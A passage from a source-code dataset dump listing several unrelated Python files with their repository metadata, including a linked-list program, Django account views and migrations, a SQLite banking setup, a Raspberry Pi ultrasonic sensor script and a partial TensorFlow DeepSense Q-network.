prev_node = None # previous node is used to delete the next link of last node
while temp.next is not None:
prev_node = temp
temp = temp.next
prev_node.next = None
del temp # delete the last node
self.numOfNodes -= 1
def remove_with_data(self, data):
temp = self.head
prev_node = None
if self.head is None:
return
while temp is not None and temp.data != data: # we are comparing data with node data
prev_node = temp
temp = temp.next
if temp is None: # it means we could not found the element because last node pointer is null
return
self.numOfNodes -= 1
if prev_node is None: # it means there are only one node present at a time
self.head = temp.next
else:
prev_node.next = temp.next
def Traverse(self):
if self.head is None:
print("LIST IS EMPTY.\n")
else:
temp = self.head
while temp is not None:
print(f"{temp.data} -->", end='')
temp = temp.next
if __name__ == '__main__':
SLL = SinglyLinkedList()
while True:
print("\n<-- Singly Linked List -->\n"
"1. Insert_At_Start\n"
"2. Insert_At_End\n"
"3. Insert_At_Pos\n"
"4. Remove_From_Start\n"
"5. Remove_From_End\n"
"6. Remove_With_Data\n"
"7. Display_List\n"
"8. Exit\n")
print("Enter a choice: ", end='')
choice = int(input())
if choice == 1:
a = input("Enter a data: ")
SLL.insert_first(a)
print("\n")
if choice == 2:
a = input("Enter a data: ")
SLL.insert_end(a)
print('\n')
if choice == 3:
a = input("Enter a data: ")
b = int(input("Enter a position"))
SLL.insert_at_pos(a, b)
if choice == 4:
SLL.remove_first()
if choice == 5:
SLL.remove_end()
if choice == 6:
a = input("Enter Data: ")
SLL.remove_with_data(a)
if choice == 7:
SLL.Traverse()
if choice == 8:
exit()
| [
"noreply@github.com"
] | vampireStromx07.noreply@github.com |
44700434fd4cdec1476966e21bc25efef89394b2 | 314807ffb26beca108ba13287938dd48d94f24ed | /contrato/apps.py | 133fca6783c6c4d61680fd926700c10fefdd282b | [] | no_license | pacok/PruebaEnr | baa1829eafa5aca345e0690110c07b8b22cd18fc | 866409fd982b772fc457062a9c2f7cee7e7e5512 | refs/heads/master | 2020-03-21T11:43:35.879638 | 2018-06-24T22:42:51 | 2018-06-24T22:42:51 | 138,519,124 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 156 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.apps import AppConfig
class ContratoConfig(AppConfig):
name = 'contrato'
| [
"pacocamas85@gmail.com"
] | pacocamas85@gmail.com |
5f2cd0a19c39911ec4ee3506692f2aaf89cb099f | 3d8a2d2124c484a7ac81835296c0a8834af8df6e | /one/prompt/init.py | 7b8fdc2da8a08af92d6fca59fb204653d241e2e2 | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | DNXLabs/one-cli | e067a2a9d49c61494abcd9ba4b63626f656cdbb9 | 37265189ab184e6fa7569c201b181ba5d95a0a2a | refs/heads/master | 2022-12-14T09:15:32.052749 | 2021-09-16T00:08:35 | 2021-09-16T00:08:35 | 253,417,937 | 7 | 1 | Apache-2.0 | 2021-09-16T00:08:36 | 2020-04-06T06:51:25 | Python | UTF-8 | Python | false | false | 1,955 | py | from one.docker.image import AZURE_AUTH_IMAGE, GSUITE_AUTH_IMAGE, TERRAFORM_IMAGE
CREATION_QUESTION = [
{
'type': 'input',
'name': 'create',
'message': 'Do you want to create workspaces now? [Y/n]',
'default': 'Y'
}
]
IMAGE_QUESTIONS = [
{
'type': 'input',
'name': 'terraform',
'default': TERRAFORM_IMAGE,
'message': 'Terraform docker image:',
'validate': lambda text: len(text) >= 4 or 'Must be at least 4 character.'
},
{
'type': 'input',
'name': 'gsuite',
'default': GSUITE_AUTH_IMAGE,
'message': 'G Suite docker image:',
'validate': lambda text: len(text) >= 4 or 'Must be at least 4 character.'
},
{
'type': 'input',
'name': 'azure',
'default': AZURE_AUTH_IMAGE,
'message': 'Azure docker image:',
'validate': lambda text: len(text) >= 4 or 'Must be at least 4 character.'
},
]
WORKSPACE_QUESTIONS = [
{
'type': 'input',
'name': 'AWS_ACCOUNT_ID',
'message': 'What\'s your AWS_ACCOUNT_ID credential:',
'validate': lambda text: len(text) >= 1 or 'Must be at least 1 character.'
},
{
'type': 'input',
'name': 'AWS_ROLE',
'message': 'What\'s your AWS_ROLE credential:',
'validate': lambda text: len(text) >= 1 or 'Must be at least 1 character.'
},
{
'type': 'input',
'name': 'WORKSPACE',
'message': 'What\'s your WORKSPACE credential:',
'validate': lambda text: len(text) >= 1 or 'Must be at least 1 character.'
},
{
'type': 'input',
'name': 'assume_role',
'default': 'n',
'message': 'Do you want to this workspace to assume role? [Y/n]'
},
{
'type': 'input',
'name': 'new_workspace',
'default': 'Y',
'message': 'Do you want to create another workspace? [Y/n]'
}
]
| [
"arthurbdiniz@gmail.com"
] | arthurbdiniz@gmail.com |
1e14a12fb0353af32a9218ab79645ee9b390dfb1 | 51554f9c49231e4a0c7a0356456050e927ce2884 | /accounts/views.py | 901b9709e55d1d06d857e863436a139628cc653d | [
"Apache-2.0"
] | permissive | geoffreynyaga/ANGA-UTM | 10a2958e172faad66e414b561ec035a2162571e7 | 68d3033529490d3fb57ac727c8c2a2f77fcffae6 | refs/heads/master | 2022-12-09T18:30:25.622423 | 2022-01-10T18:07:29 | 2022-01-10T18:07:29 | 232,053,896 | 8 | 3 | Apache-2.0 | 2022-11-22T03:59:59 | 2020-01-06T08:10:06 | JavaScript | UTF-8 | Python | false | false | 4,576 | py | from django.shortcuts import render
from django.contrib.auth import login, logout
from django.contrib.auth.decorators import login_required
from django.contrib.auth.forms import AuthenticationForm
from django.contrib.auth.models import User
from django.contrib.auth.mixins import LoginRequiredMixin
from django.core.exceptions import PermissionDenied
from django.urls import reverse_lazy
from django.forms.models import inlineformset_factory
from django.http import HttpResponseRedirect
from django.urls import reverse
from django.views import generic
from flight_plans.models import FlightLog
from rpas.models import Rpas
from . import (
forms,
) # TODO: where is this needed? see line below and resolve to use just one in this doc
from .forms import UserForm
from .models import UserProfile
# Create your views here.
class LoginView(generic.FormView):
form_class = AuthenticationForm
success_url = reverse_lazy("view_airspace")
template_name = "accounts/login.html"
def get_form(self, form_class=None):
if form_class is None:
form_class = self.get_form_class()
return form_class(self.request, **self.get_form_kwargs())
def form_valid(self, form):
login(self.request, form.get_user())
return super().form_valid(form)
def logout_view(request):
logout(request)
return HttpResponseRedirect("/account/login")
class SignUp(generic.CreateView):
form_class = forms.UserCreateForm
success_url = reverse_lazy("login")
template_name = "accounts/signup.html"
@login_required() # only logged in users should access this
def edit_user(request, pk):
# querying the User object with pk from url
user = User.objects.get(pk=pk)
# prepopulate UserProfileForm with retrieved user values from above.
user_form = UserForm(instance=user)
# The sorcery begins from here, see explanation below
ProfileInlineFormset = inlineformset_factory(
User,
UserProfile,
fields=(
"phone_number",
"organization",
"bio",
"profile_pic",
"location",
"birth_date",
),
)
formset = ProfileInlineFormset(instance=user)
if request.user.is_authenticated and request.user.id == user.id:
if request.method == "POST":
user_form = UserForm(request.POST, request.FILES, instance=user)
formset = ProfileInlineFormset(request.POST, request.FILES, instance=user)
if user_form.is_valid():
created_user = user_form.save(commit=False)
formset = ProfileInlineFormset(
request.POST, request.FILES, instance=created_user
)
if formset.is_valid():
created_user.save()
formset.save()
# return HttpResponseRedirect('/account/profile/')
return HttpResponseRedirect(
reverse("accounts:view_profile", args=(user.id,))
)
return render(
request,
"accounts/edit_profile.html",
{"noodle": pk, "noodle_form": user_form, "formset": formset},
)
else:
raise PermissionDenied
# class view_profile(generic.TemplateView):
# template_name = "accounts/profile.html"
# # model = UserProfile
#
# def get(self, request):
# myrpas = Rpas.objects.filter(organization = request.user.userprofile.organization)
# myflightlogs = FlightLog.objects.filter(user = request.user)
# args = {'myrpas': myrpas, 'myflightlogs':myflightlogs}
# return render(request, self.template_name ,args)
class ViewProfile(LoginRequiredMixin, generic.DetailView):
template_name = "accounts/profile.html"
model = UserProfile
def get_context_data(self, *args, **kwargs):
context = super(ViewProfile, self).get_context_data(**kwargs)
pk = self.kwargs["pk"]
thisuser = User.objects.get(pk=pk)
org = thisuser.userprofile.organization
context["myrpas"] = Rpas.objects.filter(organization=org)
context["myflightlogs"] = FlightLog.objects.filter(user=thisuser)
return context
def error_404(request, exception):
data = {}
return render(request, "errors/404.html", data)
def error_500(request):
data = {}
return render(request, "errors/500.html", data)
| [
"noreply@github.com"
] | geoffreynyaga.noreply@github.com |
69996a44f24cbfa09ce1c8ed3af02287be65387f | 62d6fae8a4a87a3fcf1f513f59be0fc06bed2cd9 | /B13/A'.py | 1110c59c66c47584ea964310cc61267f93b4adea | [] | no_license | tsub/atcoder | 878bdd3d4f1e4d14245e2604860cd5db548dfea9 | 9f4bd29f89dc2c39146c2fbfe84ed6c4f3d4ade2 | refs/heads/master | 2021-01-02T09:14:15.616037 | 2014-12-13T14:26:44 | 2014-12-13T14:26:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 55 | py | print ["A", "B", "C", "D", "E"].index(raw_input()) + 1
| [
"nor.known.to.life.51122@gmail.com"
] | nor.known.to.life.51122@gmail.com |
d2a5cb571e2cb8f533bc23fe4059f396c6a4d194 | 1e37b2c02b462689e7468d58cacff1167951294a | /class inherance 2 do 1 1do 2.py | c39deaddc1a49173433b5e60cda82752e56452b1 | [] | no_license | MProMikolajczyk/Python-script | 43f00706959996b1e97980adcba19d47103f4480 | 7512c8b1aac65ba6a652d81dfed301bf2fb7b830 | refs/heads/master | 2023-04-12T23:17:39.195642 | 2019-04-02T13:04:54 | 2019-04-02T13:04:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 528 | py | class Employee(object):
def __init__(self, name):
self.name = name
def greet(self, other):
print "Hello, %s" % other.name
class CEO(Employee):
def greet(self, other):
print "Get back to work, %s!" % other.name
ceo = CEO("Emily") # zdefiniowanie pracownika Emily, wykonanie polecenia init
emp = Employee("Steve") #zdefiniowanie pracowanika Steve wykoanie poleceni init
emp.greet(ceo) # Pracownik Emily ma zrobić do co w klasie Employee w greet
ceo.greet(emp) # Pracownik Steve ma zrobić to co w clasie CEO
| [
"marekmikolajczyk87@gmail.com"
] | marekmikolajczyk87@gmail.com |
fa09ff4b64386bcb5a0fe8d33436793ee2d37e6b | 633ae9d33ca81991b18c589abf246bec3dbec33c | /eventex/subscriptions/migrations/0001_initial.py | de9bbee8f210ce81ebabfd82161bee80a6d35566 | [] | no_license | izaguerreiro/eventex | e2b812ffdac26b820d957d7b35121b27f802e20b | d8ead2d5a906a39cdaa55ffa6949321cd56fd1b9 | refs/heads/master | 2016-08-10T20:18:36.781515 | 2016-03-06T19:05:43 | 2016-03-06T19:05:43 | 49,826,462 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 807 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2016-02-07 16:41
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Subscription',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
('cpf', models.CharField(max_length=11)),
('email', models.EmailField(max_length=254)),
('phone', models.CharField(max_length=20)),
('created_at', models.DateTimeField(auto_now_add=True)),
],
),
]
| [
"izaguerreiro@gmail.com"
] | izaguerreiro@gmail.com |
daeade6f715afe5c0ed4936a572a5099f1f1ffce | 0c773120fa14e2ff192139adc151c45b8056bb91 | /ssrnai/views/percevejo/percevejo_sequence.py | ac6f07b4c996e563ca0546d77a2aede0faa20b38 | [] | no_license | marcelo-soares-souza/gbp | b9c7c575c8ed0e52859011c28037037a7f9629b0 | 24c1945f162eb0f5f7f62379fafea37755b74fa0 | refs/heads/master | 2021-12-02T10:58:46.169309 | 2021-11-24T13:16:25 | 2021-11-24T13:16:25 | 92,402,805 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 870 | py | from django.views.generic import DetailView
from ssrnai.models.percevejo.percevejo_dsrna_information import PercevejoDsrnaInformation
from ssrnai.models.percevejo.percevejo_gene_information import Percevejo_Gene_Information
from ssrnai.models import Database
class PercevejoSequence(DetailView):
template_name = 'percevejo/percevejo_sequence.html'
context_object_name = 'sequence'
model = PercevejoDsrnaInformation
fields = '__all__'
def get_context_data(self, **kwargs):
context = super(PercevejoSequence, self).get_context_data(**kwargs)
context['dsrna'] = PercevejoDsrnaInformation.objects.get(id=int(self.kwargs['pk']))
dsrna = context['dsrna']
context['gene'] = Percevejo_Gene_Information.objects.get(id=int(dsrna.gene_id))
context['database'] = Database.objects.get(id=int(5))
return context
| [
"doglasparise@gmail.com"
] | doglasparise@gmail.com |
ece9f316a0fefeadcadb2e990278059d95d89c1d | dfd9242399e5ab22c6bc1001d85d40a188b6e9c8 | /base.py | 27609ea14551d69608b4189ba898fb5271e6270d | [
"MIT"
] | permissive | OwenLeng/PathFakeGit | 790f3fa42e31214df5f83b62fe29873bd280a166 | 908326efd46c31f2b7b7837f0a5f4b557eb99f78 | refs/heads/main | 2023-03-29T05:36:31.976608 | 2021-04-02T10:11:50 | 2021-04-02T10:11:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 796 | py | # 一些基础常见的代码
from config import *
import random
import numpy as np
# 为随机数产生函数设置固定种子,便于实验复现
def setup_seed(seed):
torch.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
np.random.seed(seed)
random.seed(seed)
torch.backends.cudnn.deterministic = True
# 根据max_len为列表补齐,如果没有指定max_len,则根据数据自动计算
def pad_zero(lst, max_len=-1):
if max_len == -1:
for i in lst:
max_len = max(max_len, len(i))
for cnt in range(len(lst)):
lst[cnt] = lst[cnt] + [0] * (max_len - len(lst[cnt]))
# 截断过长的部分;当max-len是手动设置的参数时,需要截断长度超过的部分
lst[cnt] = lst[cnt][:max_len]
return lst
| [
"zperfet007@gmail.com"
] | zperfet007@gmail.com |
910d4ad967a26c438eceeb266e4f0d924120ea93 | 592729cad6ab341e2abd1bb1055e8ac99dcf0784 | /src/differentiation/types/Expression.py | 25f008c789dee3ddbbf942a40f13147f14fc33a6 | [
"MIT"
] | permissive | YihanKim/derivative | 8240fdea8b0830014750ae51e624cc896f88d048 | 2865a82388efb04decedab09a05a99b06aed933f | refs/heads/master | 2020-04-29T04:05:41.230312 | 2019-03-15T16:42:41 | 2019-03-15T16:42:41 | 175,835,556 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 410 | py | from abc import *
class Expression(object):
@abstractmethod
def __init__(self, value):
self.type = "expression"
@abstractmethod
def __repr__(self):
return ""
@abstractmethod
def evaluate(self, env: dict):
return 0
@abstractmethod
def gradient(self, var: str):
return Number(0)
@abstractmethod
def reduce(self):
return self
| [
"kabi@kaist.ac.kr"
] | kabi@kaist.ac.kr |
0177cede3a8b28b7b2aff2d72fce4ffb56adc509 | 4a2812a69059c7c5905e7aa70026d6863d046f7f | /gdp.py | 2e861951f6a944d03a6ff25b15553bf2ced28e1c | [] | no_license | cuilji/learn-py | 9a9b67f4e5cc87ee3d0f1f2cb46d1dc4ce0d5be4 | d867d6d2ecfa0099f1aa0548ac2ff3855495de10 | refs/heads/master | 2020-06-07T17:31:37.751772 | 2018-10-09T10:50:32 | 2018-10-09T10:50:32 | 14,684,308 | 0 | 0 | null | null | null | null | GB18030 | Python | false | false | 194 | py | # -*- coding: utf-8 -*-
#2000年gdp10万亿元
#unit 亿元
gdp=340903
#Year2017gdp=827122
for year in range(2010, 2046):
print('Year' + str(year) +':'+ str(gdp*1.08))
gdp=gdp*1.1
| [
"cuilji@163.com"
] | cuilji@163.com |
9791a65f02a98f974e83315b8ae98a66d0308a9d | 74b667802f795a45743c390511dac4deb05a56b6 | /src/ltpl/associate_embedding/ae.py | 373fa63d3dbfb80f793d2c77ef4c3472d9c300a0 | [
"BSD-2-Clause"
] | permissive | DuinoDu/ltpl | fe7b4d5dc429638e644d88ee14e7b22c1ada54d1 | d5bacaed539f2118b8054c58afedfc4ca8dc6ba6 | refs/heads/master | 2021-01-02T18:30:21.577452 | 2020-02-11T11:20:09 | 2020-02-11T11:20:09 | 239,744,199 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,758 | py | # -*- coding: utf-8 -*-
"""label-target-predict convert utility in pose task"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import numpy as np
__all__ = ['Encoder', 'Decoder']
class GenerateHeatmap():
"""
ported from https://github.com/princeton-vl/pose-ae-train
"""
def __init__(self, num_parts, sigma, keep_invis, output_res=None):
self.output_res = output_res # [h, w]
self.num_parts = num_parts
self.keep_invis = keep_invis
self.sigma = sigma # self.output_res/64
size = 6 * sigma + 3
x = np.arange(0, size, 1, float)
y = x[:, np.newaxis]
x0, y0 = 3*sigma + 1, 3*sigma + 1
self.g = np.exp(- ((x - x0) ** 2 + (y - y0) ** 2) / (2 * sigma ** 2))
def __call__(self, keypoints, output_res=None):
if output_res is None:
output_res = self.output_res
assert output_res is not None
hms = np.zeros(shape = (self.num_parts, self.output_res[0], self.output_res[1]), dtype = np.float32)
hms_weight = np.zeros_like(hms)
sigma = self.sigma
for p in keypoints:
for idx, pt in enumerate(p):
if (self.keep_invis and pt[2] == 0.0) or ( (not self.keep_invis) and pt[2] == 2.0):
continue
x, y = int(pt[0]), int(pt[1])
if x<0 or y<0 or x>=self.output_res[1] or y>=self.output_res[0]:
continue
ul = int(x - 3*sigma - 1), int(y - 3*sigma - 1)
br = int(x + 3*sigma + 2), int(y + 3*sigma + 2)
c,d = max(0, -ul[0]), min(br[0], self.output_res[1]) - ul[0]
a,b = max(0, -ul[1]), min(br[1], self.output_res[0]) - ul[1]
cc,dd = max(0, ul[0]), min(br[0], self.output_res[1])
aa,bb = max(0, ul[1]), min(br[1], self.output_res[0])
hms[idx, aa:bb,cc:dd] = np.maximum(hms[idx, aa:bb,cc:dd], self.g[a:b,c:d])
hms_weight[idx, :, :] = 1.0
return hms, hms_weight
class KeypointsRef():
"""
ported from https://github.com/princeton-vl/pose-ae-train
"""
def __init__(self, max_num_people, num_parts, keep_invis):
self.max_num_people = max_num_people
self.num_parts = num_parts
self.keep_invis = keep_invis
def __call__(self, keypoints, output_res):
visible_nodes = np.zeros((self.max_num_people, self.num_parts, 2))
visible_weight = np.zeros_like(visible_nodes)
for i in range(len(keypoints)):
tot = 0
for idx, pt in enumerate(keypoints[i]):
x, y = int(pt[0]), int(pt[1])
if (self.keep_invis and pt[2] == 0.0) or ( (not self.keep_invis) and pt[2] == 2.0):
continue
if x>=0 and y>=0 and x<output_res[0] and y<output_res[1]:
visible_nodes[i][tot] = (idx * output_res[0] * output_res[1] + y * output_res[1] + x, 1)
visible_weight[i, tot, :] = 1.0
tot += 1
return visible_nodes, visible_weight
class Encoder(object):
"""Label to target transform for Associative Embedding task
Parameter
---------
input_size : tuple, [h, w]
input size
target_size : tuple, [h, w]
target size
num_keypoint : int
keypoint sum
gauss_sigma: float
gaussian sigma
max_num_people: int
max people num in one image, default is 30
"""
def __init__(self, input_size, target_size, num_keypoint, gauss_sigma, max_num_people=30, keep_invis=True):
self.input_size = input_size
self.target_size = target_size
self.stride = input_size[0] // target_size[0]
self.num_keypoint = num_keypoint
self.guass_sigma = gauss_sigma
self.keep_invis = keep_invis
self.generateHeatmap = GenerateHeatmap(num_keypoint, gauss_sigma, keep_invis, output_res=target_size)
self.keypointsRef = KeypointsRef(max_num_people, num_keypoint, keep_invis)
def __call__(self, keypoints):
"""convert label to target
"""
keypoints = keypoints.reshape(-1, self.num_keypoint, 3)
keypoints[:, :, :2] /= self.stride
heatmap, heatmap_weight = self.generateHeatmap(keypoints)
ref, ref_weight = self.keypointsRef(keypoints, self.target_size)
return heatmap, heatmap_weight, ref, ref_weight
class Decoder(object):
"""Target to predict transform for Associative Embedding task
"""
def __init__(self):
pass
def __call__(self):
"""convert target to predict
"""
pass
| [
"min.du@horizon.ai"
] | min.du@horizon.ai |
cdb2b31f8a4c2e0d5d6375db41784375b733313b | fe813d91aa9e7ca6a68992419b9a10fe3042fbfc | /2.control_flow/continueStatements.py | 268885a1339b82019764b277b5b6ed30681b4b48 | [] | no_license | helmigandi/belajar-python | 90ba217431792de5c56f585b478b06aa5c8604e0 | 068cfef94f1e996a87e0d58da6fe4b762bc7d9c0 | refs/heads/master | 2022-03-11T08:53:02.739725 | 2019-11-28T10:43:34 | 2019-11-28T10:43:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 951 | py | # The continue statement, also borrowed from C,
# continues with the next iteration of the loop:
for num in range(2, 10):
if num % 2 == 0:
print("Found an even number", num)
continue
print("Found a number", num)
# Found an even number 2
# Found a number 3
# Found an even number 4
# Found a number 5
# Found an even number 6
# Found a number 7
# Found an even number 8
# Found a number 9
print("=================================")
while True:
print('Who are you?')
name = input()
if name != 'Joe':
# print("You are not Joe")
continue
print('Hello, Joe. What is the password? (It is a fish.)')
password = input()
if password == 'swordfish':
break
print('Access granted.')
# Who are you?
# andi
# Who are you?
# Joe
# Hello, Joe. What is the password? (It is a fish.)
# fish
# Who are you?
# Joe
# Hello, Joe. What is the password? (It is a fish.)
# swordfish
# Access granted. | [
"sugandihelmi@gmail.com"
] | sugandihelmi@gmail.com |
ee6503afdf41e84a97286eeb85e6c01d02098750 | 17084c0f57095ea6cd7ce242b16ec9d8cd18442c | /__init__.py | 69b736e1133ccf7aa1a1ebc489368519e8082113 | [] | no_license | zishan0215/simple_banking_program | 1fc096a3c489ebe80b4fd73125e88b017e10b8d4 | e13f2420d3e55c0875b48aa354da963873c8dbc3 | refs/heads/master | 2021-05-28T23:18:30.021411 | 2014-06-30T15:02:18 | 2014-06-30T15:02:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,437 | py | import sqlite3
if __name__ == '__main__':
con = sqlite3.connect('bank_data.db')
con.execute('''
CREATE TABLE bank (id INT(11) PRIMARY KEY,
name VARCHAR(40) NOT NULL, location VARCHAR(40) NOT NULL, capital
DOUBLE NOT NULL, customers INT(11), employees INT(11));
''')
con.execute('''
CREATE TABLE customers(id INT(11) NOT NULL,
name VARCHAR(40) NOT NULL, password VARCHAR(40), balance DOUBLE,
loans INT(11), account_number INT(11) PRIMARY KEY NOT NULL, credit_card_number INT(11));
''')
con.execute('''
CREATE TABLE employees(id INT(11) PRIMARY KEY NOT NULL,
name VARCHAR(40), password VARCHAR(40), salary DOUBLE,
position VARCHAR(40), location VARCHAR(40));
''')
con.commit()
con.execute('''
INSERT INTO bank(id, name, location, capital, customers, employees)
VALUES (1,'The Python Bank', 'Toshiba Satellite', 10000000,
0, 1);
''')
con.execute('''
INSERT INTO employees(id, name, password, salary,
position, location) VALUES (1, 'Zishan',
'Zishan2', 100000, 'CEO', 'Toshiba Satellite');
''')
con.commit()
con.close()
| [
"zishanahmad@outlook.com"
] | zishanahmad@outlook.com |
9ab213f1250f7ee72910eff49250c80c7409c0f6 | 50258fa1da842ed44ebd53d612a530424dc35ff2 | /Clones/Project/24.1.1_UltrasonicRanging/UltrasonicRanging_1.py | 827c7d2274576e87bd187ff8aa74c72f9ec43699 | [] | no_license | bnnk/PyKit-Project | 26230d2d2c58972a2423ed1f2d4478f92f93629d | fac511c342b2b844e7843f4aeb90b1cbc3d50cf4 | refs/heads/master | 2020-05-20T19:54:35.343331 | 2019-05-13T15:14:59 | 2019-05-13T15:14:59 | 185,733,381 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,206 | py | #!/usr/bin/env python3
########################################################################
# Filename : UltrasonicRanging.py
# Description : Get distance from UltrasonicRanging.
# Author : freenove
# modification: 2018/08/03
########################################################################
import RPi.GPIO as GPIO
import time
trigPin = 16
echoPin = 18
MAX_DISTANCE = 220 #define the maximum measured distance
timeOut = MAX_DISTANCE*60 #calculate timeout according to the maximum measured distance
def pulseIn(pin,level,timeOut): # function pulseIn: obtain pulse time of a pin
t0 = time.time()
while(GPIO.input(pin) != level):
if((time.time() - t0) > timeOut*0.000001):
return 0;
t0 = time.time()
while(GPIO.input(pin) == level):
if((time.time() - t0) > timeOut*0.000001):
return 0;
pulseTime = (time.time() - t0)*1000000
return pulseTime
def getSonar(): #get the measurement results of ultrasonic module,with unit: cm
GPIO.output(trigPin,GPIO.HIGH) #make trigPin send 10us high level
time.sleep(0.00001) #10us
GPIO.output(trigPin,GPIO.LOW)
pingTime = pulseIn(echoPin,GPIO.HIGH,timeOut) #read plus time of echoPin
distance = pingTime * 340.0 / 2.0 / 10000.0 # the sound speed is 340m/s, and calculate distance
return distance
def setup():
print ('Program is starting...')
GPIO.setmode(GPIO.BOARD) #numbers GPIOs by physical location
GPIO.setup(trigPin, GPIO.OUT) #
GPIO.setup(echoPin, GPIO.IN) #
def loop():
GPIO.setup(11,GPIO.IN)
while(True):
distance = getSonar()
if (distance > 50):
print ("Buddy You are Far ...")
elif ((distance < 50) and (distance > 20)):
print ("Buddy You are Near ...")
else:
print ("Buddy You are Very Near ...")
#print ("The distance is : %.2f cm"%(distance))
time.sleep(1)
if __name__ == '__main__': #program start from here
setup()
try:
loop()
except KeyboardInterrupt: #when 'Ctrl+C' is pressed, the program will exit
GPIO.cleanup() #release resource
| [
"root@projects@caramelinux.com"
] | root@projects@caramelinux.com |
b9b49b32098120d98e1c3780520463075447b77e | 61658c8225fc0a55ec96634fba9f90d382bd7292 | /deep_Q_trader/deepSense.py | 7134510c2390e433c00ee55f7225f4fdef775df6 | [] | no_license | chpark17/rips_realai | 03eb45fb389cbd47d222b0c64e457385f207879f | 2c2c7815997d4d87dbc2a960cfb1764560716ea8 | refs/heads/master | 2020-03-22T02:51:46.295029 | 2018-11-05T17:35:07 | 2018-11-05T17:35:07 | 139,397,759 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,451 | py | '''
This file build the DeepSense network (unified deep learning network for timeseries data).
more info: https://arxiv.org/abs/1611.01942
'''
from os.path import join
import tensorflow as tf
from constants import *
class DropoutKeepProbs:
'''Defines the keep probabilities for different dropout layers'''
def __init__(self, conv_keep_prob=1.0, dense_keep_prob=1.0, gru_keep_prob=1.0):
self.conv_keep_prob = conv_keep_prob
self.dense_keep_prob = dense_keep_prob
self.gru_keep_prob = gru_keep_prob
class DeepSenseParams:
'''Defines the parameters for the DeepSense Q Network Architecture'''
def __init__(self, dropoutkeeprobs = None):
#Timeseries Parameters
self.num_actions = NUM_ACTIONS
self.num_channels = NUM_CHANNELS
self.split_size = SPLIT_SIZE
self.window_size = WINDOW_SIZE
#Dropout Layer Parameters
self._dropoutkeeprobs = dropoutkeeprobs
#Convolutional Layer Parameters
self.filter_sizes = FILTER_SIZES # a list with length 2
self.kernel_sizes = KERNEL_SIZES # a list with length 2
self.padding = PADDING
#GRU Parameters
self.gru_cell_size = GRU_CELL_SIZE
self.gru_num_cells = GRU_NUM_CELLS
#FullyConnected Network Parameters
self.dense_layer_sizes = DENSE_LAYER_SIZES
@property
def dropoutkeepprobs(self):
return self._dropoutkeeprobs
@dropoutkeepprobs.setter
def dropoutkeepprobs(self, value):
self._dropoutkeeprobs = value
class DeepSense:
'''DeepSense Architecture for Q function approximation over Timeseries'''
def __init__(self, deepsenseparams, logger, sess, name='DeepSense'):
self.params = deepsenseparams
self.logger = logger
self.sess = sess
self.__name__ = name
self._weights = None
@property
def action(self):
return self._action
@property
def avg_q_summary(self):
return self._avg_q_summary
@property
def params(self):
return self._params
@params.setter
def params(self, value):
self._params = value
@property
def name(self):
return self.__name__
@property
def values(self):
return self._values
@property
def weights(self):
if self._weights is None:
self._weights = {}
variables = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES,
scope=self.__name__)
for variable in variables:
name = "/".join(variable.name.split('/')[1:])
self._weights[name] = variable
return self._weights
def conv2d_layer(self, inputs, filter_size, kernel_size, padding, name, reuse, activation=None):
return tf.layers.conv2d(
inputs=inputs,
filters=filter_size, # an int, number of filters. i.e. the size of outputs
kernel_size=[1, kernel_size], # filter (window) size with the first dimention fixed to 1
strides=(1, 1), # move the filter by 1 each time
padding=padding, # a string, "valid" or "same" (case-insensitive)
activation=activation, # activation function
name=name, # a string
reuse=reuse # a boolean, whether to reuse the weights of a previous layer by the same name
)
def dense_layer(self, inputs, num_units, name, reuse, activation=None):
output = tf.layers.dense(
inputs=inputs,
units=num_units, # an int or long, the size of outputs
activation=activation,
name=name,
reuse=reuse
)
return output
# ignore units during the training phase of certain set of neurons which is chosen at random
# At each training stage, individual nodes are either dropped out of the net with probability 1-p or kept with probability p
# to prevent over-fitting
def dropout_layer(self, inputs, keep_prob, name, is_conv=False):
if is_conv:
channels = tf.shape(inputs)[-1] # the last enrty of the input shape is the number of channels
return tf.nn.dropout(
x = inputs, # a floating point tensor
keep_prob=keep_prob, # a scalar Tensor with the same type as x. The probability that each element is kept.
name=name,
noise_shape=[
self.batch_size, 1, 1, channels
] # A 1-D Tensor of type int32, representing the shape for randomly generated keep/drop flags.
)
else:
return tf.nn.dropout(
inputs,
keep_prob=keep_prob,
name=name
)
def build_model(self, state, reuse = False): # reuse's default value changed from false to ture (!)
inputs = state[0] # size of state[0]: [batch_size, history_length, num_channels]
trade_rem = state[1] # shape of state[1]: [batch_size,]
with tf.variable_scope(self.__name__, reuse=reuse):
with tf.name_scope('phase'): # create a new variable named 'phase' in the computational graph
self.phase = tf.placeholder(dtype=tf.bool) # fed with boolean inputs (in any shape) and output a tensor
with tf.variable_scope('input_params', reuse=reuse): # create a new variable named 'input_params' in the computational graph
self.batch_size = tf.shape(inputs)[0] # the length of the inputs, not fixed
# step 0: reshape the inputs
inputs = tf.reshape(inputs,
shape=[self.batch_size,
self.params.split_size,
self.params.window_size, # history_length = split_size*window_size
self.params.num_channels]) # shape of a single input: [split_size,window_size,num_channels]
with tf.variable_scope('conv_layers', reuse=reuse): # create a new variable named 'conv_layers' in the computational graph
window_size = self.params.window_size
num_convs = len(self.params.filter_sizes)
for i in range(0, num_convs): # create num_convs convolutional layers in the computational graph
